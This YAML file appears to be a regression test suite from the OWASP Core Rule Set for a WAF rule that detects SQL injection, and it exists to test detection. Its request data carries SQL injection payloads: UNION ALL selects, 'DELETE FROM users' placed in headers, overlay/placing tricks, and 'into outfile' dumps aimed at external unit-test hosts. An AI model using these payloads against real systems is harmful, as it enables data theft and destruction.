---
meta:
  author: "Jose Nazario, azurit"
rule_id: 942480
tests:
  - test_id: 1
    desc: "SQL Injection Attack"
    stages:
      - input:
          dest_addr: "127.0.0.1"
          headers:
            Host: "localhost"
            Cache-Control: "no-cache, no-store, must-revalidate"
            User-Agent: "OWASP CRS test agent"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          method: GET
          port: 80
          # variable name boundary attacks
          uri: "/get?'msdasql'"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [942480]
  - test_id: 2
    desc: "SQL Injection Attack"
    stages:
      - input:
          dest_addr: "127.0.0.1"
          headers:
            Host: "localhost"
            Cache-Control: "no-cache, no-store, must-revalidate"
            # variable name boundary attacks
            Cookie: "'msdasql'"
            User-Agent: "OWASP CRS test agent"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          method: POST
          port: 80
          uri: "/post"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [942480]
  - test_id: 3
    desc: "Data dump using 'into outfile'"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Host: localhost
            User-Agent: "OWASP CRS test agent"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          method: POST
          port: 80
          uri: "/post"
          data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [942480]
  - test_id: 4
    desc: "Data dump using 'into outfile'"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Host: localhost
            User-Agent: "OWASP CRS test agent"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          method: POST
          port: 80
          uri: "/post"
          data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [942480]
  - test_id: 5
    desc: "SQL injection using 'UNION ALL"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Host: localhost
            User-Agent: "OWASP CRS test agent"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          method: POST
          port: 80
          uri: "/post"
          data: "var=0.3480567293179807' UNION ALL select NULL --"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [942480]
  - test_id: 6
    desc: "SQL injection using 'UNION ALL"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Host: localhost
            User-Agent: "OWASP CRS test agent"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          method: POST
          port: 80
          uri: "/post"
          data: "var=config.ini\") UNION ALL select NULL --"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [942480]
  - test_id: 7
    desc: "SQL injection using 'UNION ALL"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Host: localhost
            User-Agent: "OWASP CRS test agent"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          method: POST
          port: 80
          uri: "/post"
          data: "var=CRS) UNION ALL select NULL --"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [942480]
  - test_id: 8
    desc: "SQL injection using 'UNION ALL"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Host: localhost
            User-Agent: "OWASP CRS test agent"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          method: POST
          port: 80
          uri: "/post"
          data: "var=CRS3\") UNION ALL select NULL --"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [942480]
  - test_id: 9
    desc: "SQL injection using 'overlay(...placing..)"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Host: localhost
            User-Agent: "OWASP CRS test agent"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          method: GET
          port: 80
          uri: "/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [942480]
  - test_id: 10
    desc: "SQL injection in User-Agent"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Host: localhost
            User-Agent: DELETE FROM users;--
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          method: GET
          port: 80
          uri: "/get"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [942480]
  - test_id: 11
    desc: "SQL injection in arbitrary header"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Host: localhost
            User-Agent: "OWASP CRS test agent"
            SomeHeader: DELETE FROM users;--
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          method: GET
          port: 80
          uri: "/get"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [942480]
  - test_id: 12
    desc: "SQL injection using 'overlay(...placing..) with newlines"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Host: localhost
            User-Agent: "OWASP CRS test agent"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          method: GET
          port: 80
          uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [942480]
